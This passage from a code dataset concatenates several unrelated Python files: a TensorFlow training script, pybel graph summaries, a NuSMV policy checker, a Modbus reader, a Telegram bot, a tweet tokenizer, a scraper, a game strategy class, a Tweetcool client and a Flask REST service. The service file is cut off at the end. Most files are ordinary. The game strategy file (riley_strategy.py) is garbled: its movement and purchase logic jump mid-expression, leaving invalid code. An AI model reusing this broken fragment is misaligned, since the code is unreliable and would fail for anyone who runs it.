get_parsed_dataset(tfrecord_name):\n raw_dataset = tf.data.TFRecordDataset(tfrecord_name)\n parsed_dataset = raw_dataset.map(_parse_image_function)\n return parsed_dataset\n\n\ndef load_and_preprocess_image(image_raw, data_augmentation=False):\n # decode\n image_tensor = tf.io.decode_image(contents=image_raw, channels=CHANNELS, dtype=tf.dtypes.float32)\n\n if data_augmentation:\n image = tf.image.random_flip_left_right(image=image_tensor)\n image = tf.image.resize_with_crop_or_pad(image=image,\n target_height=int(IMAGE_HEIGHT * 1.2),\n target_width=int(IMAGE_WIDTH * 1.2))\n image = tf.image.random_crop(value=image, size=[IMAGE_HEIGHT, IMAGE_WIDTH, CHANNELS])\n image = tf.image.random_brightness(image=image, max_delta=0.5)\n else:\n image = tf.image.resize(image_tensor, [IMAGE_HEIGHT, IMAGE_WIDTH])\n\n return image\n\n\ndef generate_datasets(train_tfrecord, valid_tfrecord, b_size):\n train_dataset = get_parsed_dataset(tfrecord_name=train_tfrecord)\n valid_dataset = get_parsed_dataset(tfrecord_name=valid_tfrecord)\n # test_dataset = get_parsed_dataset(tfrecord_name=test_tfrecord)\n\n train_count = get_the_length_of_dataset(train_dataset)\n valid_count = get_the_length_of_dataset(valid_dataset)\n # test_count = get_the_length_of_dataset(test_dataset)\n\n # read the dataset in the form of batch\n train_dataset = train_dataset.batch(batch_size=b_size)\n valid_dataset = valid_dataset.batch(batch_size=b_size)\n # test_dataset = test_dataset.batch(batch_size=b_size)\n\n return train_dataset, valid_dataset, train_count, valid_count \n\n\ndef get_the_length_of_dataset(ds):\n cnt = 0\n for di in ds:\n cnt += 1\n return cnt\n\n\ndef get_model(name=\"squeezenet\"):\n if name == \"squeezenet\":\n from models import squeezenet\n return squeezenet.SqueezeNet()\n\n\nif __name__ == \"__main__\":\n gpus = tf.config.list_physical_devices(\"GPU\")\n save_model_dir = \"/workspace/saved/\"\n save_every_n_epoch = 1\n print(EPOCHS)\n # configuration.EPOCHS = 200\n if gpus:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n train_dataset, valid_dataset, train_count, valid_count = generate_datasets(\"./train.tfrecords\", \"./val.tfrecords\", 10)\n model = get_model()\n\n # define loss and optimizer\n loss_object = tf.keras.losses.SparseCategoricalCrossentropy()\n optimizer = tf.keras.optimizers.RMSprop()\n\n train_loss = tf.keras.metrics.Mean(name='train_loss')\n train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\n valid_loss = tf.keras.metrics.Mean(name='valid_loss')\n valid_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='valid_accuracy')\n \n # @tf.function\n def train_step(image_batch, label_batch):\n with tf.GradientTape() as tape:\n predictions = model(image_batch, training=True)\n loss = loss_object(y_true=label_batch, y_pred=predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(grads_and_vars=zip(gradients, model.trainable_variables))\n\n train_loss.update_state(values=loss)\n train_accuracy.update_state(y_true=label_batch, y_pred=predictions)\n\n # @tf.function\n def valid_step(image_batch, label_batch):\n predictions = model(image_batch, training=False)\n v_loss = loss_object(label_batch, predictions)\n\n valid_loss.update_state(values=v_loss)\n valid_accuracy.update_state(y_true=label_batch, y_pred=predictions)\n\n # start training\n for epoch in range(EPOCHS):\n step = 0\n for features in train_dataset:\n step += 1\n images, labels = process_features(features, data_augmentation=True)\n 
train_step(images, labels)\n print(\"Epoch: {}/{}, step: {}/{}, loss: {:.5f}, accuracy: {:.5f}\".format(epoch,\n EPOCHS,\n step,\n math.ceil(train_count / BATCH_SIZE),\n train_loss.result().numpy(),\n train_accuracy.result().numpy()))\n\n for features in valid_dataset:\n valid_images, valid_labels = process_features(features, data_augmentation=False)\n valid_step(valid_images, valid_labels)\n\n print(\"Epoch: {}/{}, train loss: {:.5f}, train accuracy: {:.5f}, \"\n \"valid loss: {:.5f}, valid accuracy: {:.5f}\".format(epoch,\n EPOCHS,\n train_loss.result().numpy(),\n train_accuracy.result().numpy(),\n valid_loss.result().numpy(),\n valid_accuracy.result().numpy()))\n train_loss.reset_states()\n train_accuracy.reset_states()\n valid_loss.reset_states()\n valid_accuracy.reset_states()\n\n if epoch % save_every_n_epoch == 0:\n model.save_weights(filepath=save_model_dir+\"epoch-{}\".format(epoch), save_format='tf')\n\n\n # save weights\n model.save_weights(filepath=save_model_dir+\"model\", save_format='tf')\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"312877268","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\nThis module contains functions that provide aggregate summaries of graphs including visualization with matplotlib,\nprinting summary information, and exporting summarized graphs\n\n\"\"\"\n\nfrom __future__ import print_function\n\nimport logging\n\nimport networkx as nx\nimport pandas as pd\n\nfrom pybel.struct.summary.node_summary import count_functions\nfrom .edge_summary import count_relations\nfrom .provenance import count_unique_authors, count_unique_citations\n\n__all__ = [\n 'plot_summary_axes',\n 'plot_summary',\n 'info_list',\n 'info_str',\n 'info_json',\n 'print_summary',\n]\n\nlog = logging.getLogger(__name__)\n\n\ndef plot_summary_axes(graph, lax, rax, logx=True):\n \"\"\"Plots your graph summary statistics on the given axes.\n\n After, you should run :func:`plt.tight_layout` and you must run :func:`plt.show` to view.\n\n Shows:\n 1. Count of nodes, grouped by function type\n 2. Count of edges, grouped by relation type\n\n :param pybel.BELGraph graph: A BEL graph\n :param lax: An axis object from matplotlib\n :param rax: An axis object from matplotlib\n\n Example usage:\n\n >>> import matplotlib.pyplot as plt\n >>> from pybel import from_pickle\n >>> from pybel_tools.summary import plot_summary_axes\n >>> graph = from_pickle('~/dev/bms/aetionomy/parkinsons.gpickle')\n >>> fig, axes = plt.subplots(1, 2, figsize=(10, 4))\n >>> plot_summary_axes(graph, axes[0], axes[1])\n >>> plt.tight_layout()\n >>> plt.show()\n \"\"\"\n ntc = count_functions(graph)\n etc = count_relations(graph)\n\n df = pd.DataFrame.from_dict(dict(ntc), orient='index')\n df_ec = pd.DataFrame.from_dict(dict(etc), orient='index')\n\n df.sort_values(0, ascending=True).plot(kind='barh', logx=logx, ax=lax)\n lax.set_title('Number of nodes: {}'.format(graph.number_of_nodes()))\n\n df_ec.sort_values(0, ascending=True).plot(kind='barh', logx=logx, ax=rax)\n rax.set_title('Number of edges: {}'.format(graph.number_of_edges()))\n\n\ndef plot_summary(graph, plt, logx=True, **kwargs):\n \"\"\"Plots your graph summary statistics. This function is a thin wrapper around :func:`plot_summary_axes`. It\n automatically takes care of building figures given matplotlib's pyplot module as an argument. 
After, you need\n to run :func:`plt.show`.\n\n :code:`plt` is given as an argument to avoid needing matplotlib as a dependency for this function\n\n Shows:\n\n 1. Count of nodes, grouped by function type\n 2. Count of edges, grouped by relation type\n\n :param pybel.BELGraph graph: A BEL graph\n :param plt: Give :code:`matplotlib.pyplot` to this parameter\n :param kwargs: keyword arguments to give to :func:`plt.subplots`\n\n Example usage:\n\n >>> import matplotlib.pyplot as plt\n >>> from pybel import from_pickle\n >>> from pybel_tools.summary import plot_summary\n >>> graph = from_pickle('~/dev/bms/aetionomy/parkinsons.gpickle')\n >>> plot_summary(graph, plt, figsize=(10, 4))\n >>> plt.show()\n \"\"\"\n fig, axes = plt.subplots(1, 2, **kwargs)\n lax = axes[0]\n rax = axes[1]\n\n plot_summary_axes(graph, lax, rax, logx=logx)\n plt.tight_layout()\n\n return fig, axes\n\n\ndef info_list(graph):\n \"\"\"Returns useful information about the graph as a list of tuples\n\n :param pybel.BELGraph graph: A BEL graph\n :rtype: list\n \"\"\"\n number_nodes = graph.number_of_nodes()\n result = [\n ('Nodes', number_nodes),\n ('Edges', graph.number_of_edges()),\n ('Citations', count_unique_citations(graph)),\n ('Authors', count_unique_authors(graph)),\n ('Network density', nx.density(graph)),\n ('Components', nx.number_weakly_connected_components(graph)),\n ]\n\n try:\n result.append(('Average degree', sum(graph.in_degree().values()) / float(number_nodes)))\n except ZeroDivisionError:\n log.info('Graph has no nodes')\n\n if graph.warnings:\n result.append(('Compilation warnings', len(graph.warnings)))\n\n return result\n\n\ndef info_json(graph):\n \"\"\"Returns useful information about the graph as a dictionary\n\n :param pybel.BELGraph graph: A BEL graph\n :rtype: dict\n \"\"\"\n return dict(info_list(graph))\n\n\ndef info_str(graph):\n \"\"\"Puts useful information about the graph in a string\n\n :param pybel.BELGraph graph: A BEL graph\n :rtype: str\n \"\"\"\n return '\\n'.join('{}: {}'.format(k, v) for k, v in info_list(graph))\n\n\ndef print_summary(graph, file=None):\n \"\"\"Prints useful information about the graph\n\n :param pybel.BELGraph graph: A BEL graph\n :param file: A writeable file or file-like object. 
If None, defaults to :data:`sys.stdout`\n \"\"\"\n print(info_str(graph), file=file)\n","sub_path":"src/pybel_tools/summary/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"493396011","text":"#!/usr/bin/env python3\n\nimport copy\nimport datetime\nimport subprocess\nimport pprint\nimport time\nimport os\nimport tempfile\n\nimport Boolean as MyBoolean\n\nclass CTLPolicy:\n def __init__(self, string):\n self.boolean = MyBoolean.Boolean(string)\n\n def getConditions(self):\n yield from self.boolean.getConditions()\n\n def getConstraints(self, controller):\n for condition in self.boolean.getConditions():\n yield from condition.getConstraints()\n\n def getRelatedVariables(self, controller, graph):\n for condition in self.boolean.getConditions():\n yield from condition.getVariables()\n\n def dumpNumvModel(self, controller):\n string_list = [controller.dumpNumvModel()]\n string_list.append('')\n string_list.append(' SPEC AG ({});'.format(self.boolean.getString()))\n return '\\n'.join(string_list)\n\n def findWhichRules(self, previous_state, current_state, transitions, controller):\n rules = set()\n\n for channel_variable in current_state:\n current_value = current_state[channel_variable]\n previous_value = previous_state[channel_variable]\n\n if current_value == previous_value:\n continue\n\n if channel_variable not in transitions:\n rules.add('ENV')\n continue\n\n for boolean, value, rule_name in transitions[channel_variable]:\n if boolean == 'next(attack)' and current_state['attack'] == 'TRUE':\n rules.add('ATTACK')\n break\n\n if controller.checkRuleSatisfied(previous_state, boolean):\n rules.add(rule_name)\n break\n\n return rules\n\n def parseOutput(self, output, controller):\n index = output.index('-- specification')\n output = output[index:]\n\n lines = output.splitlines()\n lines = [line.strip() for line in lines]\n if lines[0].endswith('true'):\n return {'result': 'SUCCESS'}\n\n transitions = controller.getTransitions()\n states = list()\n rules = list()\n current_state = dict()\n\n # get initial state\n index = 4\n if lines[4].startswith('-- Loop starts here'):\n index += 1\n\n while index + 1 < len(lines):\n index += 1\n line = lines[index]\n\n if line.startswith('-> State: 1.2 <-'):\n break\n\n if line.startswith('-- Loop starts here'):\n continue\n\n channel_variable, value = line.split(' = ')\n current_state[channel_variable] = value\n states.append(current_state)\n\n while index + 1 < len(lines):\n previous_state = current_state\n current_state = copy.copy(previous_state)\n\n while index + 1 < len(lines):\n index += 1\n line = lines[index]\n\n if line.startswith('-> State: '):\n break\n\n if line.startswith('-- Loop starts here'):\n continue\n\n channel_variable, value = line.split(' = ')\n current_state[channel_variable] = value\n\n rule = self.findWhichRules(previous_state, current_state, transitions, controller)\n states.append(current_state)\n rules.append(rule)\n\n return {'result': 'FAILED', 'states': states, 'rules': rules}\n\n def check(self, controller, timeout, bmc):\n model = self.dumpNumvModel(controller)\n _, filename = tempfile.mkstemp(suffix='.smv')\n with open(filename, 'w') as f:\n f.write(model)\n\n checking_start = time.perf_counter()\n try:\n cmds = ['NuSMV', '-keep_single_value_vars'] + (['-bmc'] if bmc else []) + [filename]\n p = subprocess.run(cmds, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=timeout)\n except 
subprocess.TimeoutExpired:\n return filename, None, timeout\n checking_time = time.perf_counter() - checking_start\n\n output = p.stdout.decode('UTF-8')\n result = self.parseOutput(output, controller)\n\n return filename, result, checking_time\n\n\n\n","sub_path":"SafeChain/SimpleCTLPolicy.py","file_name":"SimpleCTLPolicy.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"249791472","text":"from pymodbus.constants import Endian\nfrom pymodbus.payload import BinaryPayloadDecoder\nfrom pymodbus.payload import BinaryPayloadBuilder\nfrom pymodbus.client.sync import ModbusSerialClient as serialClient\nimport datetime\nclient = serialClient(\nmethod='ascii',\nport='COM12',\nbaudrate=115200,\ntimeout=3,\nparity='E',\nstopbits=1,\nbytesize=7 )\nprint(\"Communication on: {}\".format(client))\nprint(client.connect())\nwhile client.connect():\n resNum = int(input('Enter res number: '))\n try:\n result = client.read_holding_registers(address=resNum,count=100,unit=1)\n print(result.registers)\n\n except:\n print(\" Error \")","sub_path":"pysv2test copy.py","file_name":"pysv2test copy.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"276845860","text":"\r\nfrom teleframework.shortcuts import *\r\n\r\nfrom bot.info import info\r\n\r\nfrom bot.participate import participar_node\r\n\r\n\r\ndef start_command(ctx: BaseContext):\r\n return info(ctx)\r\n\r\n\r\ndef setup(tf: TeleFramework):\r\n\r\n tf.register_path(\r\n '',\r\n Node()\r\n )\r\n\r\n tf.register_command(\r\n '/start',\r\n start_command\r\n )\r\n\r\n tf.register_command(\r\n '/participar',\r\n lambda ctx: Redirect.create_to(['participar'])\r\n ).register_path(\r\n 'participar',\r\n participar_node\r\n )\r\n\r\n\r\n\r\n","sub_path":"bot/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"590665106","text":"from utils import InputParser\nfrom ls8_emulator import LS8Parser, CPU\n\nif __name__ == \"__main__\":\n input_parser = InputParser()\n filename = input_parser[0]\n\n ls8_parser = LS8Parser()\n ls8_parser.parse(filename)\n\n cpu = CPU()\n cpu.load_program(ls8_parser.lines_of_code)\n cpu.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86200255","text":"import pymongo, re, itertools\nimport pandas as pd\nfrom pymongo import MongoClient\nfrom collections import Counter\n\nclient = MongoClient()\ndb = client.test\ncollection = db.tweets\ndata = pd.DataFrame(list(collection.find()))\n\ndef tokenize(s):\n return re.split(r'#\\w+|@\\w+| ', s)\n \ndata['tokens'] = data['text'].apply(tokenize)\ntoken_list = list(itertools.chain(*data['tokens']))\ntoken_list = [x.lower() for x in token_list]\ntoken_list = [x.strip('| |.|,|;|:') for x in token_list]\n\nimport csv\nwith open('deutsche-stoppwoerterliste.txt', 'rb') as file:\n reader = csv.reader(file)\n stopword_list = list(reader)\nfrom compiler.ast import flatten\nstopword_list = flatten(stopword_list)\n\nstopwords = []\nfor word in stopword_list:\n stopwords.append(unicode(word))\n \ntoken_list_clean = [x for x in token_list if x not in stopwords]\nCounter(token_list_clean).most_common(45)\n\ndata['neg_keyword'] = data['tokens'].apply(lambda 
s : s.count('entgleist'))\ndata['pos_keyword'] = data['tokens'].apply(lambda s: s.count('liebe'))\n\n","sub_path":"first steps/analyze_tweets.py","file_name":"analyze_tweets.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"308955453","text":"from urllib.request import *\nfrom urllib.error import *\nfrom bs4 import BeautifulSoup\n\ndef getTitle(url):\n    try:\n        html = urlopen(url)\n    except HTTPError as e:\n        return None\n    try:\n        bsObj = BeautifulSoup(html.read(),features=\"html.parser\")\n        title = bsObj.title\n    except AttributeError as e:\n        return None\n    return title\n\ndef main():\n    title = getTitle(\"https://www.w3.org/TR/html401/struct/global.html\")\n    if(title == None):\n        print(\"Title couldn't be found\")\n    else:\n        print(title)\n\nmain()","sub_path":"src/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"427970829","text":"class RileyStrategy:\n    def __init__(self,player_index):\n        self.player_index = player_index\n\n    def will_colonize_planet(self,colony_ship_loc,game_state):\n        # colonize only when the enemy home base is more than 2 squares away\n        enemy_base = game_state['players'][0 if self.player_index == 1 else 1]['home_coords']\n        if self.calc_distance(enemy_base, colony_ship_loc) > 2:\n            return True\n        else:\n            return False\n\n    def decide_ship_movement(self,ship_index, game_state):\n        ship = game_state['players'][self.player_index]['units'][ship_index]\n        enemy_home = game_state['players'][0 if self.player_index !=0 else 1]['home_coords']\n\n        # step one square at a time towards the enemy home base\n        if ship['coords'][0]>enemy_home[0]:\n            return (-1,0)\n        elif ship['coords'][0]<enemy_home[0]:\n            return (1,0)\n        elif ship['coords'][1]>enemy_home[1]:\n            return (0,-1)\n        elif ship['coords'][1]<enemy_home[1]:\n            return (0,1)\n        else:\n            return (0,0)\n\n    # NOTE: the body of this method was corrupted in the source (text between a\n    # '<' and the following '>' had been stripped); the ship names and the Scout\n    # cost below are a reconstruction and may differ from the original.\n    def decide_purchase(self, cp, ship_size_tech):\n        cr = ['Cruiser', 12]\n        ds = ['Destroyer', 9]\n        sc = ['Scout', 6]\n        if cp >= 12:\n            return cr\n        elif cp >= 9:\n            return ds\n        else:\n            return sc\n\n    def decide_purchases(self,game_state):\n        units = []\n        tech = []\n\n        spawn_loc = game_state['players'][self.player_index]['home_coords']\n        cp = game_state['players'][self.player_index]['cp']\n        ship_size_tech = game_state['players'][self.player_index]['technology']['shipsize']\n\n        # buy a Base first if we do not already own one\n        if 'Base' not in [unit['type'] for unit in game_state['players'][self.player_index]['units']]:\n            ship_choice = ['Base', 12]\n        else:\n            ship_choice = self.decide_purchase(cp, ship_size_tech)\n\n        while cp >= ship_choice[1]:\n            if ship_size_tech<2:\n                ship_size_price = ((ship_size_tech)*5)\n                if cp > ship_size_price:\n                    ship_size_tech+=1\n                    tech.append('shipsize')\n                    cp -= ship_size_price\n\n            else:\n                if cp >= ship_choice[1]:\n                    units.append({'type':ship_choice[0], 'coords':spawn_loc})\n                    cp -= ship_choice[1]\n\n            ship_choice = self.decide_purchase(cp, ship_size_tech)\n\n        return {'units':units,'technology':tech}\n\n    def decide_removals(self, game_state):\n        # return the first unit that is still alive\n        i = 0\n        while True:\n            if game_state['players'][self.player_index]['units'][i]['alive']:\n                return game_state['players'][self.player_index]['units'][i]['unit_num']\n            else:\n                i+=1\n\n    def decide_which_unit_to_attack(self, combat_state, location, attacking_ship_index):\n        # target the first unit at this location owned by another player\n        for entry in combat_state[location]:\n            if entry['player'] != combat_state[location][attacking_ship_index]['player']:\n                return combat_state[location].index(entry)\n\n    def decide_which_units_to_screen(self, combat_state):\n        return []\n\n    def calc_distance(self,unit1_loc, unit2_loc):\n        return (((unit1_loc[0]-unit2_loc[0])**2) + ((unit1_loc[1] - 
unit2_loc[1])**2))**(0.5)","sub_path":"src/strategies/riley_strategy.py","file_name":"riley_strategy.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549510946","text":"import argparse\nimport ipaddress\nimport requests\nimport datetime\nimport time\nimport os\nimport json\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-H\", \"--host\",\n help=\"IP address of the Tweetcool server\",\n default='127.0.0.1') # Equals 'localhost'\nparser.add_argument(\"-P\", \"--port\",\n help=\"Post used by the Tweetcool server\",\n type=int,\n default=9876)\nargs = parser.parse_args()\n\ntry:\n server = {\n 'host': ipaddress.ip_address(args.host),\n 'port': args.port\n }\nexcept ValueError as e:\n print('The given host is not a valid IP address')\n exit(0)\n\nif not(1024 < server[\"port\"] < 65535):\n print('The given port number is not in the range between 1024 and 65535!')\n exit(0)\n\nserver[\"address\"] = 'http://' + server[\"host\"].compressed + ':' + str(server[\"port\"])\n\n# Logic starts here... somewhere..\n\n\ndef tweet_posting():\n requests.post(server['address'] + \"/tweet\", json={\"poster\": input(\"Poster: \"), \"content\": input(\"Tweet: \")})\n return tweet_listing()\n\n\ndef tweet_listing(filters={}):\n [print(\"{} <{}>: {}\".format(i[\"poster\"], datetime.datetime.fromtimestamp(i[\"timestamp\"]), i[\"content\"]))\n for i in json.loads(requests.get(server['address']+\"/tweet\", params={\"poster\": \"\", \"from\": 0, **filters}).text)]\n\n\ndef tweet_filtering():\n poster, date = input(\"Poster: \"), input(\"Date(YYYY-MM-DD HH:MM): \")\n try:\n if date:\n date = time.mktime(datetime.datetime.strptime(date, \"%Y-%m-%d %H:%M\").timetuple())\n return tweet_listing({\"poster\": poster, \"from\": date})\n except:\n print(\"Wrong timeformat\")\n\nwhile True:\n print(\"\\nTweetcool server client\\n\"+\"-\"*50+\"\\n(1) Post tweet\\n(2) Past tweets\\n(3) Filter tweets\\n(0) Quit\")\n try:\n choice = input(\"Select option: \")\n os.system(\"clear\")\n exec({\"1\": \"tweet_posting()\", \"2\": \"tweet_listing()\", \"3\": \"tweet_filtering()\", \"0\": \"exit()\"}[choice])\n except KeyError:\n print(\"Invalid option\")\n except EOFError:\n print()\n exit()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"21559547","text":"\n####################################################################################################\n#\n# DO NOT WORRY ABOUT ANY OF THE STUFF IN THIS SECTION. THIS HELPS YOU IMPLEMENT.\n#\n#\n\n\n# Import functions and objects the microservice needs.\n# - Flask is the top-level application. 
You implement the application by adding methods to it.\n# - Response enables creating well-formed HTTP/REST responses.\n# - requests enables accessing the elements of an incoming HTTP/REST request.\n#\nfrom flask import Flask, Response, request\nfrom datetime import datetime\nimport json\nimport src.data_service.data_table_adaptor as dta\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n# The convention is that a compound primary key in a path has the elements sepatayed by \"_\"\n# For example, /batting/willite01_BOS_1960_1 maps to the primary key for batting\n_key_delimiter = \"_\"\n_host = \"127.0.0.1\"\n_port = 5002\n_api_base = \"/api\"\n\napplication = Flask(__name__)\n\n\ndef handle_args(args):\n \"\"\"\n\n :param args: The dictionary form of request.args.\n :return: The values removed from lists if they are in a list. This is flask weirdness.\n Sometimes x=y gets represented as {'x': ['y']} and this converts to {'x': 'y'}\n \"\"\"\n\n result = {}\n\n if args is not None:\n for k,v in args.items():\n if type(v) == list:\n v = v[0]\n result[k] = v\n\n return result\n\n# 1. Extract the input information from the requests object.\n# 2. Log the information\n# 3. Return extracted information.\n#\ndef log_and_extract_input(method, path_params=None):\n\n path = request.path\n args = dict(request.args)\n data = None\n headers = dict(request.headers)\n method = request.method\n url = request.url\n base_url = request.base_url\n\n try:\n if request.data is not None:\n data = request.json\n else:\n data = None\n except Exception as e:\n # This would fail the request in a more real solution.\n data = \"You sent something but I could not get JSON out of it.\"\n\n log_message = str(datetime.now()) + \": Method \" + method\n\n # Get rid of the weird way that Flask sometimes handles query parameters.\n args = handle_args(args)\n\n inputs = {\n \"path\": path,\n \"method\": method,\n \"path_params\": path_params,\n \"query_params\": args,\n \"headers\": headers,\n \"body\": data,\n \"url\": url,\n \"base_url\": base_url\n }\n\n # Pull out the fields list as a separate element.\n if args and args.get('fields', None):\n fields = args.get('fields')\n fields = fields.split(\",\")\n del args['fields']\n inputs['fields'] = fields\n\n log_message += \" received: \\n\" + json.dumps(inputs, indent=2)\n logger.debug(log_message)\n\n return inputs\n\n\ndef log_response(path, rsp):\n \"\"\"\n\n :param path: The path parameter received.\n :param rsp: Response object\n :return:\n \"\"\"\n msg = rsp\n logger.debug(str(datetime.now()) + \": \\n\" + str(rsp))\n\n\ndef get_field_list(inputs):\n return inputs.get('fields', None)\n\n\ndef generate_success(rsp_str=None, msg=None):\n if rsp_str:\n return Response(rsp_str, status=200, content_type=\"application/json\")\n\n if not msg:\n msg = 'General resource modification succeeds'\n\n rsp_str = json.dumps({\n 'status_code': 200,\n 'msg': msg\n })\n\n return Response(rsp_str, status=200, content_type=\"application/json\")\n\n\ndef generate_resource_not_found(msg=None):\n if not msg:\n msg = 'General resource not found'\n\n rsp_str = json.dumps({\n 'status_code': 404,\n 'err_msg': msg\n })\n\n return Response(rsp_str, status=404, content_type=\"application/json\")\n\n\ndef generate_invalid(ex=None, msg=None):\n if not msg:\n msg = 'General invalid request'\n\n if not ex:\n ex = 'Unknown reason'\n\n rsp_str = json.dumps({\n 'status_code': 400,\n 'err_msg': msg + str(ex)\n })\n\n return 
Response(rsp_str, status=400, content_type=\"application/json\")\n\n\ndef generate_error(ex=None, msg=None):\n    \"\"\"\n\n    This used to be more complicated in previous semesters, but we simplified for fall 2019.\n    Does not do much now.\n    :param status_code:\n    :param ex:\n    :param msg:\n    :return:\n    \"\"\"\n    if not msg:\n        msg = 'General internal server error'\n\n    if not ex:\n        ex = 'Unknown reason'\n\n    rsp_str = json.dumps({\n        'status_code': 500,\n        'err_msg': msg + str(ex)\n    })\n\n    return Response(rsp_str, status=500, content_type=\"application/json\")\n\n\n####################################################################################################\n#\n# THESE ARE JUST SOME EXAMPLES TO HELP YOU UNDERSTAND WHAT IS GOING ON.\n#\n#\n\n# This function performs a basic health check. We will flesh this out.\n@application.route(\"/health\", methods=[\"GET\"])\ndef health_check():\n\n    rsp_data = { \"status\": \"healthy\", \"time\": str(datetime.now()) }\n    rsp_str = json.dumps(rsp_data)\n    rsp = Response(rsp_str, status=200, content_type=\"application/json\")\n    return rsp\n\n\n@application.route(\"/demo/<parameter>\", methods=[\"GET\", \"PUT\", \"DELETE\", \"POST\"])\ndef demo(parameter):\n    \"\"\"\n    This simply echoes the various elements that you get for handling a REST request.\n    Look at https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data\n\n    :param parameter: The path parameter.\n    :return: A JSON response echoing the extracted inputs.\n    \"\"\"\n\n    inputs = log_and_extract_input(demo, { \"parameter\": parameter })\n\n    msg = {\n        \"/demo received the following inputs\" : inputs\n    }\n\n    rsp = Response(json.dumps(msg), status=200, content_type=\"application/json\")\n    return rsp\n\n\n####################################################################################################\n#\n# YOU HAVE TO COMPLETE THE IMPLEMENTATION OF THE FUNCTIONS BELOW.\n#\n#\n@application.route(\"/api/databases\", methods=[\"GET\"])\ndef dbs():\n    \"\"\"\n\n    :return: A JSON object/list containing the databases at this endpoint.\n    \"\"\"\n    # -- TO IMPLEMENT --\n\n    log_and_extract_input(dbs, None)\n\n    # Your code goes here.\n\n    # Hint: Implement the function in data_table_adaptor\n    # NOTE: I'm using get_databases() function for this\n\n    rsp_data = tuple(dta.get_databases())\n\n    rsp_str = json.dumps(rsp_data)\n\n    return Response(rsp_str, status=200, content_type=\"application/json\")\n\n\n@application.route(\"/api/databases/<dbname>\", methods=[\"GET\"])\ndef tbls(dbname):\n    \"\"\"\n\n    :param dbname: The name of a database/schema\n    :return: List of tables in the database.\n    \"\"\"\n\n    inputs = log_and_extract_input(tbls, (dbname,))\n\n    # Your code goes here.\n\n    # Hint: Implement the function in data_table_adaptor\n    # NOTE: I'm using get_tables() function for this\n\n    rsp_data = tuple(dta.get_tables(dbname))\n\n    rsp_str = json.dumps(rsp_data)\n\n    return Response(rsp_str, status=200, content_type=\"application/json\")\n\n\n\n@application.route('/api/<dbname>/<resource>/<primary_key>', methods=['GET', 'PUT', 'DELETE'])\ndef resource_by_id(dbname, resource, primary_key):\n    \"\"\"\n\n    :param dbname: Schema/database name.\n    :param resource: Table name.\n    :param primary_key: Primary key in the form \"col1_col2_..._coln\" with the values of key columns.\n    :return: Result of operations.\n    \"\"\"\n    # Parse the incoming request into an application specific format.\n    context = log_and_extract_input(resource_by_id, (dbname, resource, primary_key))\n\n    #\n    # SOME CODE GOES HERE\n    #\n    # -- TO IMPLEMENT --\n\n    # Get our rdb_data_table and at the same time cache it if it doesn't exist yet\n    try:\n        
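# get_rdb_table raises if the (dbname, resource) pair cannot be resolved;\n        # the except branch below maps that to an error response\n        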
rdb_data_table = dta.get_rdb_table(resource, dbname)\n    except Exception as exception:\n        print(exception)\n        return generate_error(ex=exception, msg='No such database or table: ')\n\n    # Split by '_' to get all the key fields\n    key_fields = primary_key.split('_')\n\n    if request.method == 'GET':\n        #\n        # SOME CODE GOES HERE\n        #\n        # -- TO IMPLEMENT --\n\n        # Get field_list from context\n        field_list = get_field_list(context)\n\n        try:\n            rsp_data = rdb_data_table.find_by_primary_key(key_fields, field_list)\n        except Exception as exception:\n            print(exception)\n            return generate_error(ex=exception, msg='Fetch by primary key fails: ')\n\n        if not rsp_data:\n            msg = 'No entry with such primary key'\n            return generate_resource_not_found(msg=msg)\n\n        # To accommodate for datetime format, set the default to string\n        rsp_str = json.dumps(rsp_data, default=str)\n\n        return generate_success(rsp_str=rsp_str)\n\n    elif request.method == 'DELETE':\n        #\n        # SOME CODE GOES HERE\n        #\n        # -- TO IMPLEMENT --\n        try:\n            rsp_data = rdb_data_table.delete_by_key(key_fields)\n        except Exception as exception:\n            print(exception)\n            return generate_error(ex=exception, msg='Delete by primary key fails: ')\n\n        return generate_success(msg='Rows deleted: ' + str(rsp_data))\n\n    elif request.method == 'PUT':\n        #\n        # SOME CODE GOES HERE\n        #\n        # -- TO IMPLEMENT --\n        new_values = context['body']\n\n        try:\n            rsp_data = rdb_data_table.update_by_key(key_fields, new_values)\n        except Exception as exception:\n            print(exception)\n            return generate_error(ex=exception, msg='Update by primary key fails: ')\n\n        if rsp_data == 0:\n            is_data_found = rdb_data_table.find_by_primary_key(key_fields)\n\n            if not is_data_found:\n                msg = 'No 